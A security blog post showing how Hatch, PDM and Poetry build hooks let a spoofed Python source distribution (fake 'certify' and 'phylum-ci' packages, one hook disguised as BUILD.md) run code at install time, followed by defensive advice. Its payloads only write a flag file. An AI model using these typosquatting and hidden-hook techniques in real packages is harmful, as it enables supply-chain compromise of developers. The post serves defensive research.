Modern Python Build Hooks

This blog series has already shown that the most common infection vector for Python malware is allowing source distributions when installing packages. We've also seen that most malware gains execution by running from the setup.py file. That's old news and more likely to be noticed. Attackers want to be modern, too. Isn't there a way they can gain arbitrary code execution with the pyproject.toml file? It turns out there is.
Some build backends provide build hooks for modifying the inputs and outputs of source and built distribution creation. Hatch and PDM are two examples of package managers with related build backends offering build hook functionality. There may be others (see the addendum for Poetry at the end of this post). Hatch provides a popular build backend in hatchling, so we'll start with it to demonstrate the process.
Spoofing pyproject.toml projects
We'll start with the same certifi package that has been used throughout this series. To show just how useful Hatch is for package management, the process will be shown from the beginning. The process for spoofing pyproject.toml projects will mimic the one used in the post showing how to do so for setup.py projects.
First, be sure hatch is installed. I prefer the pipx method. Then, clone the repository for the legitimate certifi package and switch into the new directory:
❯ pipx install hatch
installed package hatch 1.10.0, installed using Python 3.12.3
These apps are now globally available
- hatch
done! ✨ 🌟 ✨
❯ git clone git@github.com:certifi/python-certifi.git python-certify
Cloning into 'python-certify'...
remote: Enumerating objects: 934, done.
remote: Counting objects: 100% (278/278), done.
remote: Compressing objects: 100% (127/127), done.
remote: Total 934 (delta 207), reused 152 (delta 151), pack-reused 656
Receiving objects: 100% (934/934), 1.34 MiB | 668.00 KiB/s, done.
Resolving deltas: 100% (473/473), done.
Install Hatch and clone the certifi repo
Next, use Hatch to initialize the existing project. This is a nice feature since it will automatically convert the old setuptools configuration using setup.py to the modern PEP 518 pyproject.toml format, adhering to PEP 621 to boot!
## Initialize the existing project
❯ hatch --no-interactive new --init
Migrating project metadata from setuptools
## The output indicates a successful migration, but what did it do?
❯ git status --short
?? pyproject.toml
## Okay, it added a `pyproject.toml` file. Is that enough to build now?
❯ hatch build
──────────────── sdist ────────────────
dist/certifi-2024.2.2.tar.gz
──────────────── wheel ────────────────
dist/certifi-2024.2.2-py3-none-any.whl
Use Hatch to convert setup.py metadata to pyproject.toml
That was easy. A few commands and we were able to create source and built distributions from an automagically generated, standards-compliant pyproject.toml file. However, we didn't seek to rebuild the wheel. We want to create a spoofed package that doesn't rely on setup.py to run our bad code. To do that, we need to make some modifications to pyproject.toml. For reference, here is the original that Hatch generated:
[build-system]
requires = ["hatchling"]
build-backend = "hatchling.build"
[project]
name = "certifi"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
license = "MPL-2.0"
requires-python = ">=3.6"
authors = [
{ name = "Kenneth Reitz", email = "me@kennethreitz.com" },
]
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
]
[project.urls]
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"
[tool.hatch.version]
path = "certifi/__init__.py"
[tool.hatch.build.targets.sdist]
include = [
"/certifi",
]
The pyproject.toml file generated by Hatch
We'll add it to source control (git add pyproject.toml) so changes will be more obvious. The first change to make is to rename the project from certifi to certify. Hatch's logic to automatically detect files to be included when building a wheel relies on the project name matching the file structure. Just like in the previous post about package spoofing, we want a fake distribution package while retaining the import package naming structure. To do that, we need to override the default logic and tell Hatch where to find the files. Here are the changes made in pyproject.toml to meet those goals:
❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..74d720b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,7 +3,7 @@ requires = ["hatchling"]
build-backend = "hatchling.build"
[project]
-name = "certifi"
+name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
@@ -40,3 +40,8 @@ path = "certifi/__init__.py"
include = [
"/certifi",
]
+
+[tool.hatch.build.targets.wheel]
+packages = ["certifi"]
Diff view in pyproject.toml after spoofing changes
These changes are enough to build a spoofed package with both source and built distributions.
❯ hatch build
──────────────── sdist ────────────────
dist/certify-2024.2.2.tar.gz
──────────────── wheel ────────────────
dist/certify-2024.2.2-py3-none-any.whl
Building distributions with Hatch
Notice that the distribution package is now certify. After installation, the import package is still certifi. That's great, but it doesn't provide much in the way of new techniques. Sure, Hatch can be used to convert setup.py projects to pyproject.toml ones, but let's crack some eggs and get messy.
Hatching evil plans
Hatch is very much a modern tool, adhering to the latest packaging standards. It eschews the legacy methods of defining metadata and package configuration in a setup.py file, which is essentially an arbitrary code execution vector. Instead, it adopts pyproject.toml as the PEP 518 compliant plaintext configuration file. There's no way arbitrary code can run from a config file, right? Right!? You may be asking, "What about my custom package generation steps? How am I supposed to compile extensions for all the various platform types my project supports?"
Hatch has you covered. Hatch provides build hooks to get around this limitation. These build hooks are offered in the form of plugins, either third-party (i.e., more build requirements) or first-party by adhering to a reference plugin interface. The interface allows for writing code that will be executed at one or more points in the build process:
- clean: occurs before the build process if the -c/--clean flag was passed to the build command, or when invoking the clean command
- initialize: occurs immediately before each build
- finalize: occurs immediately after each build
Additionally, Hatch provides one built-in build hook named custom. It is this hook that will be used to deliver our malicious payload since it requires the least amount of additional code. It is enabled with a single line added to the pyproject.toml configuration:
[tool.hatch.build.targets.wheel.hooks.custom]
The default configuration for this custom build hook specifies hatch_build.py as the file containing the custom implementation of the interface. The file name and/or path can be different, but we'll use the default for this example to avoid adding another line to pyproject.toml. For reference, this is now the full difference in the configuration file as compared to the one initially generated by Hatch:
❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..889ab73 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,7 +3,7 @@ requires = ["hatchling"]
build-backend = "hatchling.build"
[project]
-name = "certifi"
+name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
@@ -40,3 +40,12 @@ path = "certifi/__init__.py"
include = [
"/certifi",
]
+
+# This section is required because the project name
+# was changed and no longer matches the package name.
+[tool.hatch.build.targets.wheel]
+packages = ["certifi"]
+
+# This empty table entry triggers execution of the
+# `hatch_build.py` module when building wheels.
+[tool.hatch.build.targets.wheel.hooks.custom]
Diff view in pyproject.toml after enabling build hooks
Next, we'll write a minimal plugin implementation using hatch_build.py. We choose to use the initialize entry point since it is more likely to run for every build (the finalize entry point may not be called if the build fails). The "malicious" code simply adds a file to a temporary directory to serve as a flag indicating when the code runs. Real malware would be more complex and likely obfuscated.
from hatchling.builders.hooks.plugin.interface import BuildHookInterface


class CustomBuildHook(BuildHookInterface):
    def initialize(self, version, build_data):
        # Code in this function will run before building
        with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
            f.write("Malware could have run here")
Build hook with "malware" in hatch_build.py
Building the source distribution with this change and using it to install the package shows that the newly added code does indeed run:
## With only two added and modified files...
❯ git status --short
AM pyproject.toml
?? hatch_build.py
## ...we can build a spoofed source distribution that
## contains those files, to be used when building a wheel
❯ hatch build --target sdist
──────────────── sdist ────────────────
dist/certify-2024.2.2.tar.gz
## Create a Python virtual environment
❯ python -m venv .venv
## ...and activate it for demo use
❯ source .venv/bin/activate
## See that there is no flag present
❯ ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory
## Installing the package does not indicate anything bad happened...
❯ python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
Building wheel for certify (pyproject.toml) ... done
Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164156 sha256=105c8292d17e6976de036db187899f12c0c28dd7a6cf6a31b03b6a094c718e95
Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/43/8d/c9/91f4cd154b7df7fbc77d07b6d2012a4f0b9a289da49d46706d
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2
## ...but now there is a "flag.txt" file...
❯ ls -alh /private/tmp/flag.txt
-rw-r--r-- 1 maxrake wheel 27B May 2 12:57 /private/tmp/flag.txt
## ...which proves that any arbitrary code can run in "hatch_build.py"
❯ cat /private/tmp/flag.txt
Malware could have run here
Source distribution used to execute payload during wheel build step of package installation
PDM FTW
The same process works when using the build hooks offered by the pdm-backend package that comes from the PDM project. Here is what that looks like, using the same certifi package as a starting point.
## Install PDM (I prefer using pipx)
❯ pipx install pdm
installed package pdm 2.15.1, installed using Python 3.12.3
These apps are now globally available
- pdm
done! ✨ 🌟 ✨
## Clone the legitimate `certifi` package repo and switch into directory
❯ git clone git@github.com:certifi/python-certifi.git python-certify-pdm
Cloning into 'python-certify-pdm'...
remote: Enumerating objects: 971, done.
remote: Counting objects: 100% (314/314), done.
remote: Compressing objects: 100% (143/143), done.
remote: Total 971 (delta 226), reused 196 (delta 171), pack-reused 657
Receiving objects: 100% (971/971), 1.35 MiB | 5.91 MiB/s, done.
Resolving deltas: 100% (492/492), done.
## Use Hatch to migrate from `setup.py` to `pyproject.toml`
❯ hatch --no-interactive new --init
Migrating project metadata from setuptools
## Add the configuration file to source control, for later diffs
❯ git add pyproject.toml
Install PDM and use Hatch to initiate the spoofed project
At this point, the pyproject.toml file looks like the one from before, when Hatch was used. It needs a few adjustments to be used with PDM. For starters, the build backend has to change. Plus, some PEP 621 metadata fields need to be updated to match the expected format even though the content is fine. After those modifications, the pyproject.toml file looks like this:
[build-system]
requires = ["pdm-backend"]
build-backend = "pdm.backend"
[project]
name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
license = { text = "MPL-2.0" }
requires-python = ">=3.6"
authors = [
{ name = "Kenneth Reitz", email = "me@kennethreitz.com" },
]
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
]
[project.urls]
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"
[tool.pdm.version]
source = "file"
path = "certifi/__init__.py"
PDM and project configuration in pyproject.toml
Here is the difference from the one generated by Hatch:
❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..29302fd 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,13 +1,13 @@
[build-system]
-requires = ["hatchling"]
-build-backend = "hatchling.build"
+requires = ["pdm-backend"]
+build-backend = "pdm.backend"
[project]
-name = "certifi"
+name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
-license = "MPL-2.0"
+license = { text = "MPL-2.0" }
requires-python = ">=3.6"
authors = [
{ name = "Kenneth Reitz", email = "me@kennethreitz.com" },
@@ -33,10 +33,6 @@ classifiers = [
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"
-[tool.hatch.version]
+[tool.pdm.version]
+source = "file"
path = "certifi/__init__.py"
-
-[tool.hatch.build.targets.sdist]
-include = [
- "/certifi",
-]
Diff view in pyproject.toml after converting metadata from Hatch to PDM specifications
Enabling PDM build hooks is as easy as creating a pdm_build.py module in the root of the project directory and populating it with one or more of the defined functions from the build hook interface API. The module name can be different but requires an additional entry in the pyproject.toml configuration. This is a minimal pdm_build.py implementation used to plant our flag for wheel builds:
def pdm_build_hook_enabled(context):
    # Only enable for wheel builds
    return context.target == "wheel"


def pdm_build_initialize(context):
    # Code in this function will run before building
    with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
        f.write("Malware could have run here")
Build hooks with "malware" in pdm_build.py
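Because these hooks are plain module-level functions, they can be spotted without importing (and therefore without executing) the module. Here is a small sketch that walks the syntax tree instead. The pdm_build_ prefix is inferred from the two function names used in this post, so treat it as an assumption rather than a complete description of the PDM hook interface. The function name pdm_hook_functions is ours.

```python
import ast


def pdm_hook_functions(source):
    """Return names of top-level functions that start with 'pdm_build_'."""
    tree = ast.parse(source)  # parses only; nothing in the module is run
    return [
        node.name
        for node in tree.body
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef))
        and node.name.startswith("pdm_build_")
    ]


SAMPLE = '''
def pdm_build_hook_enabled(context):
    return context.target == "wheel"

def pdm_build_initialize(context):
    pass

def helper():
    pass
'''

print(pdm_hook_functions(SAMPLE))
# ['pdm_build_hook_enabled', 'pdm_build_initialize']
```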
Building the source distribution with this change and using it to install the package shows that the newly added code does indeed run. The demonstration steps are essentially the same as for Hatch, but this time the virtual environment is created before building the source distribution so PDM will use it instead of creating one.
## There are only two added and modified files
❯ git status --short
AM pyproject.toml
?? pdm_build.py
## Create a Python virtual environment and activate it for use
❯ python -m venv .venv && source .venv/bin/activate
## We can build a spoofed source distribution containing
## the new files, to be used when building a wheel
❯ pdm build --no-wheel --quiet
Building sdist...
INFO: Inside an active virtualenv /Users/maxrake/dev/phylum/python-certify-pdm/.venv, reusing it.
Set env var PDM_IGNORE_ACTIVE_VENV to ignore it.
Built sdist at /Users/maxrake/dev/phylum/python-certify-pdm/dist/certify-2024.2.2.tar.gz
## See that there is no flag present
❯ ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory
## Installing the package does not indicate anything bad happened...
❯ python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
Building wheel for certify (pyproject.toml) ... done
Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164138 sha256=c3b6cc5f67b526e88e125f1b806ac3fb9157b93f150c94c7e8f2a9ac7adb214a
Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/8e/48/d3/1f7efdb8dc7d9332f1d58da9b9ac3e9659c43b286dccde8584
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2
## ...but now there is a "flag.txt" file...
❯ ls -alh /private/tmp/flag.txt
-rw-r--r-- 1 maxrake wheel 27B May 6 11:28 /private/tmp/flag.txt
## ...which proves that any arbitrary code can run in "pdm_build.py"
❯ cat /private/tmp/flag.txt
Malware could have run here
Source distribution used to execute payload during wheel build step of package installation
Modern hard hats and safety goggles
Once again, it has been shown that allowing source distributions to be installed anywhere in the fully resolved dependency chain introduces risk. The risk of executing arbitrary code contained within one of those source distributions is not limited to legacy setup.py structures. Modern package managers like Hatch and PDM allow for build hooks in modern pyproject.toml projects. Installing a source distribution means building the wheel that is ultimately installed, which means the hook code in hatch_build.py, pdm_build.py, or any custom-configured module will run.
If possible, disallow all source distributions during install. The pip documentation provides a guide for secure installs that recommends passing --only-binary :all: to meet the goal. It appears that Poetry allows configurations to specify no binaries (i.e., wheels) but no such option for source distributions exists. Other package installers likely suffer the same limitation.
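For automation that shells out to pip, the recommended flag can be baked into the command so that a source distribution is never built. This is a minimal sketch. The helper name binary_only_install_command is hypothetical, and the only pip option used is the --only-binary :all: one named above.

```python
import sys


def binary_only_install_command(requirement, python=sys.executable):
    """Build a pip command that refuses to install from source distributions."""
    return [python, "-m", "pip", "install", "--only-binary", ":all:", requirement]


print(binary_only_install_command("certifi", python="python"))
# ['python', '-m', 'pip', 'install', '--only-binary', ':all:', 'certifi']
```

The list can be handed to subprocess.run(command, check=True). With this option, a package that publishes no compatible wheel fails to install instead of silently falling back to its source distribution.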
One countermeasure to this class of attack is to run all package installation actions through an application sandbox. This restricts the actions available to only those filesystem and network operations deemed legitimate and effectively neuters malicious code. Phylum offers this protection in the form of the open-source Birdcage sandbox, which is baked into the Phylum CLI and can be used for Python developers using pip or Poetry with the matching official extensions.
Addendum: Undocumented Poetry build hooks
It is indeed possible to include build hooks with Poetry using either the legacy poetry build backend or the modern poetry-core one. This is an undocumented feature but has existed since the earliest days of the project. For some background and insights about the inner workings of this feature, reference these GitHub issues from the Poetry project:
- The eleventh issue ever, first talking about this feature
- An issue requesting the feature to be stabilized and documented
- An issue showing an alternate configuration for the newer poetry-core build backend
To demonstrate the use of Poetry for malicious purposes, we alter our very own phylum project and spoof it as phylum-ci, but with an added Python module disguised as a Markdown file.
## Clone the `phylum` package and switch into directory
❯ git remote -v
origin git@github.com:phylum-dev/phylum-ci.git (fetch)
origin git@github.com:phylum-dev/phylum-ci.git (push)
## See that only two files need to be modified/added
❯ git status --short
M pyproject.toml
?? BUILD.md
## Spoof the package by changing the name to `phylum-ci`
## and activate a build hook by specifying a `build` file
❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index ca0326a..6cfb131 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -5,8 +5,9 @@ requires = ["poetry-core>=1.8.1"]
build-backend = "poetry.core.masonry.api"
[tool.poetry]
-name = "phylum"
+name = "phylum-ci"
version = "0.44.0"
+build = "BUILD.md"
description = "Utilities for integrating Phylum into CI pipelines (and beyond)"
license = "GPL-3.0-or-later"
authors = ["Phylum, Inc. <engineering@phylum.io>"]
## The build file can be named anything! We seek to blend in here.
## It still needs to contain Python code and a `build()` function.
❯ cat BUILD.md
def build():
    with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
        f.write("Malware could have run here")

if __name__ == "__main__":
    build()
## Build the source distribution
❯ poetry build --format=sdist
Preparing build environment with build-system requirements poetry-core>=1.8.1
Building phylum-ci (0.44.0)
- Building sdist
- Built phylum_ci-0.44.0.tar.gz
## Create a virtual environment and activate it
❯ python -m venv delme_venv && source delme_venv/bin/activate
## Ensure the pip package cache is empty
❯ python -m pip cache purge
Files removed: 3
## Show that there is no flag present
❯ ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory
## Install the spoofed package
❯ python -m pip install dist/phylum_ci-0.44.0.tar.gz
Processing ./dist/phylum_ci-0.44.0.tar.gz
Installing build dependencies ... done
Getting requirements to build wheel ... done
Preparing metadata (pyproject.toml) ... done
Collecting cryptography (from phylum-ci==0.44.0)
Downloading cryptography-42.0.7-cp39-abi3-macosx_10_12_universal2.whl.metadata (5.3 kB)
---TRIMMED-FOR-BREVITY---
Building wheels for collected packages: phylum-ci
Building wheel for phylum-ci (pyproject.toml) ... done
Created wheel for phylum-ci: filename=phylum_ci-0.44.0-cp312-cp312-macosx_14_0_arm64.whl size=85083 sha256=8988365340f735e504d06a713cf79e7d5c17c3fe431d15553306246202559aa4
Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/47/cb/ad/69829b41685d144709dd92559c13e18e25d141402d0b40573d
Successfully built phylum-ci
Installing collected packages: urllib3, ruamel.yaml.clib, pygments, pycparser, packaging, mdurl, idna, charset-normalizer, certifi, ruamel.yaml, requests, markdown-it-py, cffi, rich, cryptography, phylum-ci
Successfully installed certifi-2024.2.2 cffi-1.16.0 charset-normalizer-3.3.2 cryptography-42.0.7 idna-3.7 markdown-it-py-3.0.0 mdurl-0.1.2 packaging-24.0 phylum-ci-0.44.0 pycparser-2.22 pygments-2.18.0 requests-2.31.0 rich-13.7.1 ruamel.yaml-0.18.6 ruamel.yaml.clib-0.2.8 urllib3-2.2.1
## See that the flag has been planted...
❯ ls -alh /private/tmp/flag.txt
-rw-r--r-- 1 maxrake wheel 27B May 8 15:33 /private/tmp/flag.txt
## ...proving that arbitrary code execution is possible.
❯ cat /private/tmp/flag.txt
Malware could have run here
Executing arbitrary code disguised as a Markdown file by using Poetry build hooks